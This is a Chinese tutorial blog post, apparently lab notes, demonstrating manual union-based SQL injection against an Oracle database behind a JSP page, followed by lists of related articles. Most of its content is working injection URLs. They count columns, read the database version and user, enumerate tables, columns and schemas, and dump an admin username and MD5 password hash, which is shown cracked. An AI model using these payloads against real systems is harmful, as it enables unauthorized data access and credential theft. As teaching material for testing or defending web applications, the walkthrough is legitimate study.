0X01 先进行判断

a.jsp?username=SMITH and =

发现单引号闭合  我们尝试构造闭合  存在注入

a.jsp?username=SMITH' and ''='1 正确

a.jsp?username=SMITH' and ''='2 错误

0X02构造语句判断

a.jsp?username=SMITH' order by 8-- 正确

a.jsp?username=SMITH' order by 9-- 错误

用null 判断那个字段是字符型  第2 3 个字段为字符型

a.jsp?username=SMITH' union select null,'null',null,null,null,null,null,null from dual-- 正确
a.jsp?username=SMITH' union select null,null,'null',null,null,null,null,null from dual-- 正确




a.jsp?username=SMITH' union select 'null',null,null,null,null,null,null,null from dual-- 错误 






0x03获取一些信息


数据库




a.jsp?username=SMITH' union select null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null from dual--








?username=SMITH' union select null,(select banner from sys.v_$version where rownum=1),(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual),null,null,null,null,null from dual--




当前用户名为SCOOTT






(select member from v$logfile where rownum=) 操作系统平台

(select instance_name from v$instance) 服务器sid




0X04爆第一个表 ADMIN




?username=SMITH' union select null,(select table_name from user_tables where rownum=1),null,null,null,null,null,null from dual--






爆第二个表 BONUS




a.jsp?username=SMITH' union select null,(select table_name from user_tables where rownum=1 and table_name not in('ADMIN')),null,null,null,null,null,null from dual--




第三个表 后面的依次类推




a.jsp?username=SMITH' union select null,(select table_name from user_tables where rownum=1 and table_name not in('ADMIN','BONUS')),null,null,null,null,null,null from dual--




0X05爆列名


第一个 ID




a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1and table_name=('ADMIN')),null,null,null,null,null,null from dual--




第二个 USERNAME




a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1and table_name=('ADMIN') and column_name not in('ID')),null,null,null,null,null,null from dual--




第三个 PASSWORD




a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1and table_name=('ADMIN') and column_name not in('ID','USERNAME')),null,null,null,null,null,null from dual--




0x06爆字段名 USERNAME=admin




/a.jsp?username=SMITH' union select null,(select USERNAME from ADMIN where rownum=1),null,null,null,null,null,null from dual--






a.jsp?username=SMITH' union select null,(select PASSWORD from ADMIN where rownum=1),null,null,null,null,null,null from dual--




PASSWORD=e10adc3949ba59abbe56e057f20f883e  123456


其他


列出数据库数据库名 SYS  其他数据库按照上面的推法 第二个数据库SYSTEM 爆了所有的




a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1 and owner not in('SYS')),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1 and owner not in('SYS','SYSTEM','EXFSYS','CTXSYS','XDB','MDSYS','APEX_030200','SCOTT','OLAPSYS')),null,null,null,null,null,null from dual--




列出表名 一样 DUAL




/a.jsp?username=SMITH' union select null,(SELECT table_name FROM all_tables where rownum=1),null,null,null,null,null,null from dual--




列出列名




.jsp?username=SMITH' union select null,(SELECT column_name FROM all_tab_columns WHERE table_name='DUAL' and rownum=1),null,null,null,null,null,null from dual--




by 谢谢卿哥带我们学习
												


											
大哥带的Orchel数据库的注入的更多相关文章
	

    
								
  1. 大哥带的Orchel数据库的盲注入bool型
		
    0X01判断闭合 ?username=SMITH' 错误 ?username=SMITH'' 正确 ?username=SMITH' and ascii(substr((select user fro ...
    
		
    2. 
						
  2. 大哥带的Orchel数据库的报错注入
		
    0X01 使用报错注入需要使用类似 1=[报错语句],1>[报错语句],使用比较运算符,这样的方式进行报错注入(MYSQL仅使用函数报错即可),类似mssql报错注入的方式. news.jsp? ...
    
		
    3. 
						
  3. 大哥带的Orchel数据库时间盲注
		
    0X01Oracle基于延时的盲注总结 0x00 前言 oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注: oracle的时间盲注通常 ...
    
		
    4. 
						
  4. 大哥带我走渗透4(中)----oracle报错注入
		
    5/30 报错注入 0x01 准备阶段 1. 基础知识今天了解了,但是,只能看懂和最基本的理解,不能自己上路.所以,还是要不停学习基础.并且及时总结.这有一篇很详细的文章:https://www.cn ...
    
		
    5. 
						
  5. Access数据库SQL注入(Access SQL Injection)
		
    一.Microsoft Office Access数据库手工注入语句  1.参数后面加  ’ .and 1=1.and 1=2看返回状态判断是否存在注入点 2.参数后面加 and exists(sel ...
    
		
    6. 
						
  6. CentOS6.5下卸载自带的MySQL数据库安装MySQL5.6
		
    1)查看CentOS自带的mysql 输入 rpm -qa | grep mysql mysql-libs-5.1.71-1.el6.x86_64 2)将其自带的mysql版本全部卸载(非常重要,如不 ...
    
		
    7. 
						
  7. 带你了解数据库中事务的ACID特性
		
    前言 前面我们介绍过数据库中 带你了解数据库中JOIN的用法 与 带你了解数据库中group by的用法的相关用法.本章节主要来介绍下数据库中一个非常重要的知识点事务,也是我们项目中或面试中经常会遇到 ...
    
		
    8. 
						
  8. 带你了解数据库中group by的用法
		
    前言 本章主要介绍数据库中group by的用法,也是我们在使用数据库时非常基础的一个知识点.并且也会涉及Join的使用,关于Join的用法,可以看我写的上一篇文章:带你了解数据库中JOIN的用法如有 ...
    
		
    9. 
						
  9. 第二百八十一节,MySQL数据库-SQL注入和pymysql模块防止SQL注入
		
    MySQL数据库-SQL注入和pymysql模块防止SQL注入 SQL注入就是通过SQL语句绕开程序判断,获取到数据库的内容 下面以一个简单的程序登录SQL注入举例: 正常登录 1.数据库有一张会员表 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 不用 Notepad++,还有更牛逼的选择!
			
    来源:oschina.net/news/110987/no-notepad-plus-plus 这两天 Notepad++ 牛逼了,然后引发了大家的关注,具体事件内容请大家自行百度,其实作为文本编辑工 ...
    
			
    2. 
						
  2. 关于float的小奥秘
			
    一. float 存储方式 1.1. float 占四个字节 1.2. 浮点数构成 1.2.1. 无论是单精度还是双精度在存储中都分为三个部分: <1>. 符号位(Sign) : 0代表正 ...
    
			
    3. 
						
  3. linux服务器之间互传文件
			
    1.传递单个文件 linux A 服务器 上的文件(假设文件为a.php) 复制到 linux B 服务器上(假设复制后的文件名为b.php) 格式为  scp 文件a的绝对路径  B服务器用户名@B ...
    
			
    4. 
						
  4. Intellij IDEA 最全实用快捷键整理
			
    正文前: 1. IDEA内存优化(秒开的快感!!) 因机器本身的配置而配置: \IntelliJ IDEA8\bin\idea.exe.vmoptions // (根据你的配置变大!!) ------ ...
    
			
    5. 
						
  5. python实现加密的方式总结
			
    python实现加密的方式总结 原文地址 目录 基础知识扫盲 Base64 MD5 DES 3DES AES RSA 基础知识扫盲 对称加密 对称密钥加密 , 又叫私钥加密.即信息发送的方和接受方用一 ...
    
			
    6. 
						
  6. HashMap 的实现原理(1.7)
			
    参考 :http://wiki.jikexueyuan.com/project/java-collection/hashmap.html https://blog.csdn.net/w22981192 ...
    
			
    7. 
						
  7. windows pip使用国内源
			
    在这里我使用清华源来做示范 win+R 打开用户目录%HOMEPATH%,在此目录下创建 pip 文件夹,在 pip 目录下创建 pip.ini 文件, 内容如下, 在pip文件夹里新建的pip.in ...
    
			
    8. 
						
  8. 使用django+rpc进行服务内部交互
			
    一.为什么使用rpc. 1)相比uwsgi,使用rpc的长连接可以不需要频繁创建连接,提高传输效率. 2)rpc支持同步和异步,对于不需要等待返回的消息可以不等待返回继续运行,减少客户端等待时间. 3 ...
    
			
    9. 
						
  9. uboot initf_dm函数分析
			
    initf_dm, static int initf_dm(void){#if defined(CONFIG_DM) && CONFIG_VAL(SYS_MALLOC_F_LEN) / ...
    
			
    10. 
						
  10. vue和cordova项目整合打包,并实现vue调用android的相机的demo
			
    经过网上查找很多资料,发现很多只有vue+cordova的项目整合,但是vue使用cordova插件的文章很少,现在把从创建cordova和创建vue到vue使用插件到项目打包到android手机运行 ...
    
			
    11.